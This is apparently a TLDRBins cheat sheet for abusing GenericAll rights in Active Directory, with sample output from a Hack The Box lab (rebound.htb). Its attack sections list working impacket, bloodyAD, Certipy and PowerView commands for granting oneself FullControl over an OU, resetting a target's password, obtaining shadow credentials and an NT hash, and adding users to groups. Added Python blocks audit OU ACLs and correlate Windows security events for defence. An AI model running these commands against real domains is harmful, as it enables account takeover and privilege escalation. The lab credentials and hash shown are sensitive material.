TLDRBins / GenericAll


Abuse #1: Change Target User Password

1. Add Full Control to Current User

sudo ntpdate -s <DC> && impacket-dacledit -k '<DOMAIN>/<USER>:<PASSWORD>' -dc-ip <DC> -principal <USER> -target-dn 'OU=<TARGET_GROUP>,DC=<EXAMPLE>,DC=<COM>' -inheritance -action write -rights FullControl -use-ldaps
Sample Output:
$ impacket-dacledit -k 'rebound.htb/oorend:1GR8t@$$4u' -dc-ip 10.10.11.231 -principal oorend -target-dn 'OU=SERVICE USERS,DC=REBOUND,DC=HTB' -inheritance -action write -rights FullControl -use-ldaps
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU
[*] DACL backed up to dacledit-20240923-015912.bak
[*] DACL modified successfully!
# Alternative using password authentication
bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' --host <DC> add genericAll 'OU=<TARGET_GROUP>,DC=<EXAMPLE>,DC=<COM>' '<USER>'
Sample Output:
$ bloodyAD -d rebound.htb -u 'oorend' -p '1GR8t@$$4u' --host 10.10.11.231 add genericAll 'OU=SERVICE USERS,DC=REBOUND,DC=HTB' 'oorend'
[+] oorend has now GenericAll on OU=SERVICE USERS,DC=REBOUND,DC=HTB

2. Change Password

bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' --host <DC> set password '<TARGET_USER>' '<NEW_PASSWORD>'
Sample Output:
$ bloodyAD -d rebound.htb -u 'oorend' -p '1GR8t@$$4u' --host 10.10.11.231 set password 'winrm_svc' 'Test1234'
[+] Password changed successfully!

Ref: bloodyAD

1. Import PowerView.ps1

. .\PowerView.ps1
Sample Output: *Evil-WinRM* PS C:\programdata> . .\PowerView.ps1

2. Change Target User Password

$password = ConvertTo-SecureString <PASSWORD> -AsPlainText -Force
Sample Output: *Evil-WinRM* PS C:\programdata> $password = ConvertTo-SecureString Test1234 -AsPlainText -Force
Set-DomainUserPassword -Identity <TARGET_USER> -AccountPassword $password
Sample Output: *Evil-WinRM* PS C:\programdata> Set-DomainUserPassword -Identity superfume -AccountPassword $password
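Defender-side check, added here and not part of the TLDRBins page: step 1 above (reused by Abuses #2 and #4) leaves an inheritable FullControl ACE on the OU, so this Python audits an OU security descriptor exported as SDDL for GenericAll, WriteDacl or WriteOwner ACEs held by principals outside an allow-list. The sample SDDL, the trusted-SID list and oorend's RID (1105) are constructed.

```python
# Added example (not TLDRBins code): audit an OU's exported security descriptor
# for allow ACEs that grant FullControl (GenericAll), or the WriteDacl/WriteOwner
# rights a principal could use to grant itself FullControl as in step 1, to SIDs
# outside an allow-list. Input is SDDL as PowerShell's (Get-Acl "AD:\<OU>").Sddl
# prints it; the sample descriptor and oorend's RID (1105) are constructed.
import re

ACE_RE = re.compile(r"\(([^;]*);([^;]*);([^;]*);[^;]*;[^;]*;([^)]*)\)")
FULL_CONTROL = 0x000F01FF                 # ADS_RIGHT mask Windows renders as FullControl
FULL_LETTERS = {"CC", "DC", "LC", "SW", "RP", "WP", "DT", "LO", "CR", "SD", "RC", "WD", "WO"}
TRUSTED = {"SY", "BA", "DA", "EA", "S-1-5-18", "S-1-5-32-544"}   # SDDL aliases and SIDs
TRUSTED_RIDS = {"500", "512", "519"}      # Administrator, Domain Admins, Enterprise Admins

# Constructed SDDL for OU=SERVICE USERS: SYSTEM and Domain Admins keep FullControl,
# Authenticated Users can read, and oorend (RID 1105) now holds an inheritable
# FullControl ACE, the state the dacledit/bloodyAD command in step 1 produces.
SAMPLE_SDDL = ("O:DAG:DAD:AI(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)"
               "(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;DA)(A;CI;LCRPLORC;;;AU)"
               "(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-4078382237-1492182817-2568127209-1105)")

def pairs(field):
    """Split an SDDL flags or rights field into its two-letter tokens."""
    return {field[i:i + 2] for i in range(0, len(field), 2)}

def rights_of(field):
    """Rights as SDDL tokens; a hex mask is mapped only for the bits this audit needs."""
    if not field.lower().startswith("0x"):
        return pairs(field)
    mask = int(field, 16)
    rights = {name for bit, name in ((0x40000, "WD"), (0x80000, "WO")) if mask & bit}
    return rights | (FULL_LETTERS if mask & FULL_CONTROL == FULL_CONTROL else set())

def is_trusted(sid):
    return sid in TRUSTED or (sid.startswith("S-1-5-21-") and sid.rsplit("-", 1)[1] in TRUSTED_RIDS)

def audit(sddl):
    """Return (sid, finding, inherited) for every risky allow ACE held by an untrusted SID."""
    findings = []
    for ace_type, flags, rights, sid in ACE_RE.findall(sddl):
        if ace_type not in ("A", "OA") or is_trusted(sid):
            continue                      # deny ACEs and the allow-list are out of scope
        r = rights_of(rights)
        if "GA" in r or FULL_LETTERS <= r:
            finding = "GenericAll"
        elif r & {"WD", "WO"}:
            finding = "WriteDacl/WriteOwner (can self-grant GenericAll)"
        else:
            continue
        findings.append((sid, finding, "ID" in pairs(flags)))
    return findings
```

Inherited ACEs (flag ID) are reported too, since they mean the grant lives on a parent container and has to be removed there.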


Abuse #2: Get Shadow Credential

1. Add Full Control to Current User

sudo ntpdate -s <DC> && impacket-dacledit -k '<DOMAIN>/<USER>:<PASSWORD>' -dc-ip <DC> -principal <USER> -target-dn 'OU=<TARGET_GROUP>,DC=<EXAMPLE>,DC=<COM>' -inheritance -action write -rights FullControl -use-ldaps
Sample Output:
$ impacket-dacledit -k 'rebound.htb/oorend:1GR8t@$$4u' -dc-ip 10.10.11.231 -principal oorend -target-dn 'OU=SERVICE USERS,DC=REBOUND,DC=HTB' -inheritance -action write -rights FullControl -use-ldaps
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU
[*] DACL backed up to dacledit-20240923-015912.bak
[*] DACL modified successfully!
bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' --host <DC> add genericAll 'OU=<TARGET_GROUP>,DC=<EXAMPLE>,DC=<COM>' '<USER>'
Sample Output:
$ bloodyAD -d rebound.htb -u 'oorend' -p '1GR8t@$$4u' --host 10.10.11.231 add genericAll 'OU=SERVICE USERS,DC=REBOUND,DC=HTB' 'oorend'
[+] oorend has now GenericAll on OU=SERVICE USERS,DC=REBOUND,DC=HTB

2. Get Shadow Credential

sudo ntpdate -s <DC> && certipy-ad shadow auto -username <USER>@<DOMAIN> -password '<PASSWORD>' -k -account <TARGET_USER> -target <DC> -scheme ldap
Sample Output:
$ sudo ntpdate -s dc01.rebound.htb && certipy-ad shadow auto -username oorend@rebound.htb -password '1GR8t@$$4u' -k -account winrm_svc -target dc01.rebound.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'winrm_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '22fdb427-7028-72b8-bc39-8f4674c644dd'
[*] Adding Key Credential with device ID '22fdb427-7028-72b8-bc39-8f4674c644dd' to the Key Credentials for 'winrm_svc'
[*] Successfully added Key Credential with device ID '22fdb427-7028-72b8-bc39-8f4674c644dd' to the Key Credentials for 'winrm_svc'
[*] Authenticating as 'winrm_svc' with the certificate
[*] Using principal: winrm_svc@rebound.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'winrm_svc.ccache'
[*] Trying to retrieve NT hash for 'winrm_svc'
[*] Restoring the old Key Credentials for 'winrm_svc'
[*] Successfully restored the old Key Credentials for 'winrm_svc'
[*] NT hash for 'winrm_svc': 4469650fd892e98933b4536d2e86e512

FIX: KDC_ERR_PADATA_TYPE_NOSUPP (KDC has no support for padata type)

# Not really a fix. Certipy returns this error when the DC cannot perform PKINIT,
# typically because it does not yet hold a usable Kerberos authentication certificate;
# run gpupdate /force as Administrator, then retry.
gpupdate /force
Sample Output:
*Evil-WinRM* PS C:\Users\Administrator\Documents> gpupdate /force
Updating policy...
Computer Policy update has completed successfully.
User Policy update has completed successfully.


Abuse #3: Add User to Group

1. Import PowerView

. .\PowerView.ps1
Sample Output: TO-DO

2. Create a Credential Object (to run as another user) [Optional]

$username = '<DOMAIN>\<USER>'
Sample Output: TO-DO
$password = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
Sample Output: TO-DO
$cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $username, $password
Sample Output: TO-DO

3. Add User to Group

Add-DomainGroupMember -Identity <TARGET_GROUP> -Members <USER> -Credential $cred
Sample Output: TO-DO


Abuse #4: Add GenericAll to Target User over Organizational Unit (OU)

# Password authentication
bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' --host <DC> add genericAll 'OU=<TARGET_GROUP>,DC=<EXAMPLE>,DC=<COM>' '<TARGET_USER>'
Sample Output: TO-DO
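Detection-side example, added here and not TLDRBins code: every abuse on this page leaves a DACL write (Event 5136 on nTSecurityDescriptor) followed by the action it enables, a password reset (4724, Abuse #1), an msDS-KeyCredentialLink write (5136, Abuse #2) or a group membership change (4728/4732/4756, Abuse #3), so this Python correlates those events per subject and escalates the chain. The event dicts and timestamps are constructed, shaped like a flattened SIEM export of Windows Security events.

```python
# Added example (not TLDRBins code): flag the two-step pattern on this page in
# Windows Security events: a DACL write (5136 on nTSecurityDescriptor), then the
# same subject resetting a password (4724), writing msDS-KeyCredentialLink (5136)
# or adding a group member (4728/4732/4756). Field names follow the event schema.
from datetime import datetime, timedelta

VALUE_ADDED = "%%14674"               # 5136 OperationType code for "Value Added"
CHAIN_WINDOW = timedelta(minutes=30)  # how long after a DACL write a follow-on counts as chained

# Constructed sample events, already flattened to dicts by the collector.
EVENTS = [
    {"EventID": 5136, "TimeCreated": "2024-09-23T01:59:12", "SubjectUserName": "oorend",
     "ObjectDN": "OU=SERVICE USERS,DC=REBOUND,DC=HTB", "OperationType": VALUE_ADDED,
     "AttributeLDAPDisplayName": "nTSecurityDescriptor"},
    {"EventID": 5136, "TimeCreated": "2024-09-23T02:03:40", "SubjectUserName": "oorend",
     "ObjectDN": "CN=winrm_svc,OU=SERVICE USERS,DC=REBOUND,DC=HTB", "OperationType": VALUE_ADDED,
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink"},
    {"EventID": 4724, "TimeCreated": "2024-09-23T02:05:01", "SubjectUserName": "oorend",
     "TargetUserName": "winrm_svc"},
    {"EventID": 4724, "TimeCreated": "2024-09-23T09:00:00", "SubjectUserName": "helpdesk01",
     "TargetUserName": "jdoe"},        # routine reset with no prior DACL change
]

def classify(ev):
    """Map an event to (action, target), or None when it is not of interest."""
    if ev["EventID"] == 5136 and ev.get("OperationType") == VALUE_ADDED:
        attr = ev["AttributeLDAPDisplayName"]
        if attr == "nTSecurityDescriptor":
            return "dacl_write", ev["ObjectDN"]
        if attr == "msDS-KeyCredentialLink":
            return "shadow_credential", ev["ObjectDN"]
    if ev["EventID"] == 4724:
        return "password_reset", ev["TargetUserName"]
    if ev["EventID"] in (4728, 4732, 4756):   # TargetUserName is the group here
        return "group_add", ev["TargetUserName"]
    return None

def triage(events):
    """One finding per event; a follow-on within CHAIN_WINDOW of the same subject's own DACL write is 'high'."""
    last_dacl_write, findings = {}, []
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        hit = classify(ev)
        if hit is None:
            continue
        action, target = hit
        when, subject = datetime.fromisoformat(ev["TimeCreated"]), ev["SubjectUserName"]
        if action == "dacl_write":
            last_dacl_write[subject] = when
        recent = subject in last_dacl_write and when - last_dacl_write[subject] <= CHAIN_WINDOW
        severity = "medium" if action == "dacl_write" else "high" if recent else "low"
        findings.append({"severity": severity, "subject": subject, "action": action, "target": target})
    return findings
```

Certipy restores the old Key Credentials right after obtaining the TGT (visible in the Abuse #2 sample output), so the msDS-KeyCredentialLink write is short-lived; matching on the Value Added event alone, as here, catches it regardless of what is written back.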